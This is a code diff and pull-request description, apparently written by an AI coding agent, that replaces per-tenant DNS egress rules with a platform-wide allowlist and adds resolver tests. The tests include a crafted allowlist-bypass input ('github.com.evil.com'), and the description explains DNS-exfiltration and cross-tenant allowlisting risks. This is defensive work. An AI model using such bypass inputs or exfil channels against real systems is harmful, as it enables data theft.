+    assert [_rcode(r) for r in h.responses] == ["NXDOMAIN"]
+    assert h.upstream_calls == []
+
+
+async def test_enforce_allows_allowlisted_via_upstream() -> None:
+    h = _Harness(GlobalDnsPolicy(patterns=("*.corp.test",)))
+    await h.ask("metrics.corp.test", "A")
+    assert len(h.upstream_calls) == 1
+    assert [_rcode(r) for r in h.responses] == ["NOERROR"]
+
+
+async def test_observe_resolves_non_allowlisted() -> None:
+    h = _Harness(GlobalDnsPolicy(mode="observe"))
+    await h.ask("not-on-any-list.test", "A")
+    assert len(h.upstream_calls) == 1
+    assert [_rcode(r) for r in h.responses] == ["NOERROR"]
+
+
+async def test_upstream_outage_is_servfail_not_nxdomain() -> None:
+    """Operators must be able to tell 'blocked' from 'resolver down'."""
+    h = _Harness(GlobalDnsPolicy(patterns=("allowed.test",)), upstream_answers=False)
+    await h.ask("allowed.test", "A")
+    assert [_rcode(r) for r in h.responses] == ["SERVFAIL"]
+
+
+async def test_multi_question_packet_refused() -> None:
+    record = dnslib.DNSRecord.question("a.test", "A")
+    record.add_question(dnslib.DNSQuestion("b.test"))
+    h = _Harness(GlobalDnsPolicy(patterns=("a.test", "b.test")))
+    await h.server._handle_packet(record.pack(), _SOURCE, h.responses.append)
+    assert [_rcode(r) for r in h.responses] == ["REFUSED"]
+    assert h.upstream_calls == []

--- a/tests/safety/test_egress_domain_rule.py
+++ b/tests/safety/test_egress_domain_rule.py
@@ -11,8 +11,8 @@ from rolemesh.safety.checks.egress_domain_rule import (
     EgressDomainCode,
     EgressDomainRuleCheck,
     EgressDomainRuleConfig,
-    _matches,
     make_egress_domain_check,
+    matches_domain,
 )
 from rolemesh.safety.types import SafetyContext, Stage
 
@@ -28,39 +28,39 @@ class _FakeRequest:
 
 
 # ---------------------------------------------------------------------------
-# _matches — the shared matching primitive
+# matches_domain — the shared matching primitive
 # ---------------------------------------------------------------------------
 
 
 class TestMatches:
     def test_exact_match(self) -> None:
-        assert _matches("api.anthropic.com", "api.anthropic.com")
+        assert matches_domain("api.anthropic.com", "api.anthropic.com")
 
     def test_exact_mismatch(self) -> None:
-        assert not _matches("api.openai.com", "api.anthropic.com")
+        assert not matches_domain("api.openai.com", "api.anthropic.com")
 
     def test_wildcard_matches_subdomain(self) -> None:
-        assert _matches("api.github.com", "*.github.com")
-        assert _matches("raw.github.com", "*.github.com")
+        assert matches_domain("api.github.com", "*.github.com")
+        assert matches_domain("raw.github.com", "*.github.com")
 
     def test_wildcard_does_not_match_evil_suffix(self) -> None:
         """Regression guard: a pattern ``*.github.com`` must NOT let
         ``github.com.evil.com`` through. The old substring-match bug
         class has burnt plenty of security products; pin it."""
-        assert not _matches("github.com.evil.com", "*.github.com")
+        assert not matches_domain("github.com.evil.com", "*.github.com")
 
     def test_wildcard_does_not_match_bare_apex(self) -> None:
         """``*.github.com`` matches subdomains only, not ``github.com``
         itself. Operators who want both must list them explicitly."""
-        assert not _matches("github.com", "*.github.com")
+        assert not matches_domain("github.com", "*.github.com")
 
     def test_case_insensitive(self) -> None:
-        assert _matches("API.Anthropic.COM", "api.anthropic.com")
-        assert _matches("API.Anthropic.COM", "*.ANTHROPIC.COM")
+        assert matches_domain("API.Anthropic.COM", "api.anthropic.com")
+        assert matches_domain("API.Anthropic.COM", "*.ANTHROPIC.COM")
 
     def test_trailing_dot_tolerated(self) -> None:
         """DNS wire-format names sometimes arrive with a trailing dot."""
-        assert _matches("api.anthropic.com.", "api.anthropic.com")
+        assert matches_domain("api.anthropic.com.", "api.anthropic.com")
 
 
 # ---------------------------------------------------------------------------

--- a/uv.lock
+++ b/uv.lock
@@ -810,6 +810,15 @@ wheels = [
 ]
 
 [[package]]
+name = "dnslib"
+version = "0.9.26"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/a2/71/269f74ef9bc8ca453af2e1768d4f4c8e7ef5f894d058d27fd1b69c754d7f/dnslib-0.9.26.tar.gz", hash = "sha256:be56857534390b2fbd02935270019bacc5e6b411d156cb3921ac55a7fb51f1a8", size = 82901, upload-time = "2025-03-03T09:17:32.606Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/16/93/167364f10194e374119b211e475ed8763d7591ae4f7001b304282dde5825/dnslib-0.9.26-py3-none-any.whl", hash = "sha256:e68719e633d761747c7e91bd241019ef5a2b61a63f56025939e144c841a70e0d", size = 64161, upload-time = "2025-03-03T09:17:31.47Z" },
+]
+
+[[package]]
 name = "docker"
 version = "7.1.0"
 source = { registry = "https://pypi.org/simple" }
@@ -2883,6 +2892,7 @@ dependencies = [
 
 [package.optional-dependencies]
 dev = [
+    { name = "dnslib" },
     { name = "mypy" },
     { name = "pytest" },
     { name = "pytest-asyncio" },
@@ -2933,6 +2943,7 @@ requires-dist = [
     { name = "croniter", specifier = ">=2.0" },
     { name = "cryptography", specifier = ">=42" },
     { name = "detect-secrets", marker = "extra == 'safety-ml'", specifier = ">=1.5" },
+    { name = "dnslib", marker = "extra == 'dev'", specifier = ">=0.9" },
     { name = "fastapi", specifier = ">=0.115" },
     { name = "filelock", marker = "extra == 'pi'", specifier = ">=3.0" },
     { name = "google-genai", marker = "extra == 'pi'", specifier = ">=1.0" },


### PR DESCRIPTION
## Step 1 of 3: retire the IP-lookup identity scheme

Plan agreed in session: ① DNS plane → platform-level allowlist (this PR) → ② signed per-job tokens for forward/reverse proxy identity, then delete the IP→Identity pipeline → ③ restore EC=off behind a dedicated `EGRESS_CONTROL_ENABLE` switch with per-tenant credentials intact. After this PR, the HTTP proxies are the **only** remaining consumers of `IdentityResolver`, which is what makes step ② a clean removal.

## Problem

The DNS resolver reused per-tenant `egress.domain_rule` rows, keyed off the source-IP → Identity map. That coupling forces the identity-distribution pipeline (NATS lifecycle events + snapshot RPC + in-memory maps on both sides) to exist for a plane that doesn't need identity at all:

- Proxied traffic never resolves its target inside the agent container — with `HTTP_PROXY` set, the hostname travels to the gateway as a string and the **gateway** resolves it on its own egress-side path. Per-tenant access control lives at the CONNECT / reverse-proxy layer and is untouched here.
- Container names (`nats`, `egress-gateway`) are answered locally by Docker's embedded DNS; only external names reach the gateway resolver.
- So every query arriving at this resolver is proxy-bypassing code: a tool missing proxy config, or a DNS-exfil attempt. The resolver is a **tripwire**, not a service.

Per-tenant DNS also had a real cross-tenant hole: tenant rules are self-service, so a malicious tenant allowlisting an attacker-controlled apex made that domain resolvable for **every** tenant's agents — a platform-wide DNS exfil channel. Operator-set platform policy closes it.

## Changes

- **`egress/dns_policy.py` (new)** — `GlobalDnsPolicy`: `EGRESS_DNS_ALLOWLIST` (comma-separated, exact or `*.suffix`, default **empty**) + `EGRESS_DNS_MODE` (`enforce` default / `observe` for migration observation). Fail-fast on a mode typo. Env-only by design — the steady-state list is empty, so DB + gateway snapshot plumbing would be cost without benefit; `platform_safety_rules` is the upgrade path if runtime editing is ever needed.
- **`egress/dns_resolver.py`** — `DnsServer(policy=...)` replaces `identity_resolver` + `safety_caller`. qtype gate (TXT/ANY/SRV → REFUSED) unchanged. Decisions are structured gateway logs with the qname redacted past the registered domain (shared `redact_dns_qname`).
- **`safety/checks/egress_domain_rule.py`** — `_matches` → public `matches_domain`, shared by tenant rules and the platform policy so wildcard semantics can't drift.
- **`gateway.py`** — policy built before any network setup (config typo kills boot, fail-closed); forward/reverse identity wiring untouched.
- **`pyproject.toml`** — `dnslib` mirrored into the dev extra so the resolver finally has CI-run unit tests (it was gateway-image-only, which is why none existed).
- **Docs** — docs/16 en+cn get a "DNS plane: platform-level policy" section (incl. the two-resolution-paths explanation and the tripwire rationale); README documents both envs.

## Accepted tradeoff (explicit)

DNS decisions no longer write `safety_decisions` rows — platform-level decisions carry no per-agent identity, and the audit fan-in's coworker re-validation rejects identity-less rows by design. Compensations: structured gateway logs (source IP, redacted qname, qtype, action), and the HTTP planes keep full per-tenant audit attribution — a DNS-exfil attempt almost always pairs with an attributed CONNECT block.

## Testing

- New unit suites: `test_dns_policy.py` (5) + `test_dns_resolver.py` (6) — qtype gate before policy, enforce/observe, NXDOMAIN-without-upstream, SERVFAIL vs NXDOMAIN distinction, env parsing fail-fast. All pass.
- `tests/safety/test_egress_domain_rule.py` updated for the rename — 29 pass.
- Full CI-parity run (`ruff` clean; `pytest tests/ --ignore=tests/attack_sim -n auto`): branch **1876 passed / 793 errors** vs main baseline **1865 passed / 795 errors** — +11 are the new tests; all errors are this sandbox's missing Docker socket (testcontainers), reproduce identically on main.
- `test_p0_dns.py` (integration, needs real Docker) rewritten for platform policy: drops rule seeding + lifecycle registration, adds an **unregistered-probe** NXDOMAIN case and an allow-path NOERROR case (`dns.google`, wired via conftest gateway Env). Not runnable in this sandbox — please run the integration suite during acceptance.

## Acceptance checklist

- [ ] `pytest tests/egress tests/safety -q` green locally
- [ ] Integration: `pytest tests/egress/integration -m integration` on a Docker host — `test_p0_dns` 4/4
- [ ] Optional: boot a dev stack with `EGRESS_DNS_MODE=observe` and confirm the would-block log stream is empty/explainable before enforcing

https://claude.ai/code/session_01WW72gXBjSTy83CmtfAPpRw

---
_Generated by [Claude Code](https://claude.ai/code/session_01WW72gXBjSTy83CmtfAPpRw)_